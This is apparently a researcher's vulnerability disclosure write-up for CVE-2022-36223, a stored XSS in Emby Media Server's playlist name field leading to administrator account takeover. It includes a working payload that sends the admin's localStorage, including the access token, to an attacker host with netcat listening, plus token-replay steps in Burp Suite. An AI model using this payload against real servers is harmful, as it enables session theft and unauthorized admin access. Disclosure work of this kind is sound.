CVE-2022-36223 / Administrator Account Takeover in Emby Media Server
Whats is Emby?
Emby is a media server designed to organize, play, and stream audio and video to a variety of devices.
This vulnerability on version 4.6.7.0
Analyzing the Application
Since I am a fan and user of Emby I decided to do some security testing.
Starting the tests we have two user accounts:
Administrator -> cupcake
Unprivileged user -> test
Logged in as test user i decided to create a playlist as shown below.
Let’s test if the “playlist name” entry is vulnerable to Cross Site Scripting (XSS).
Payload used in the test:
<img src=”x” onerror=”alert(‘XSS’)” />
Playlist name vulnerable to XSS! ≖‿≖
Now let’s log in as cupcake (administrator) and see if the payload created by the test user will trigged.
Knowing that the playlist name is vulnerable to xss we can insert a payload to steal the administrator user’s access token.
I created a new playlist where the payload will send to my VPS the localstorage where we will get the access token from the server administrator (cupcake).
Payload used in exploration:
<img src=x onerror=”document.location=’http://MYIP:PORT/?'+(JSON.stringify(localStorage))">
On the attacker’s VPS we open netcat and are listening on port 8595 waiting for our target to access the malicious playlist.
By logging in as administrator and accessing the menu on the left, the payload is automatically triggered and will send us the localstorage with the valuable information from the server administrator.
I received the locastorage and now I will analyze the json
As we can see the data is encoded and to decode it I like to use the Bup Suite decoder.
Decoder -> Decode as > URL
Another option is urldecoder, you can access it here:
After running an urldecode we can analyze the obtained data and see the data of the user cupcake, its ID and the policy where it confirms that it is the administrator of the server by Policy:IsAdministrator:true
Below the json we can see the administrator’s AccesToken, just after his UserId. ᕕ(¬ ͜ ¬)ᕗ
Getting this data I created some rules in Burp Suite under Match and Replace.
Burp Suite’s Match and Replace rules allow you to change parts of a request and a response which can be a significant help when testing web applications.
I used as rules to change the User ID and Token from the user test to the administrator cupcake.
User Test = No Privileges
User ID: 420f56e9a1be4f0d9fd6ab87846d908b
Access Token: 66463fb77a4546b58c10b47b4f9ff9ad
User cupcake = Administrator
User ID: a85f0f15dec24393bd82c270bef8a8d0
Access Token: 6732867f6cb04b03aeee22b9f03d6b44
After creating as rules, logged in as a test user, I clicked on the settings and we were able to load the admin panel, even logged in as the unprivileged user.
As determined by the rules in match and replace we are not able to elevate the privilege of the test user but we can create a new user with a server administrator profile.
Logged in with the new administrator user: pwned
Conclusion:
As the gif above shows I was able through an xss to steal the admin user’s ID and token, abuse that information using an ordinary user and create a new user on the server with an admin profile.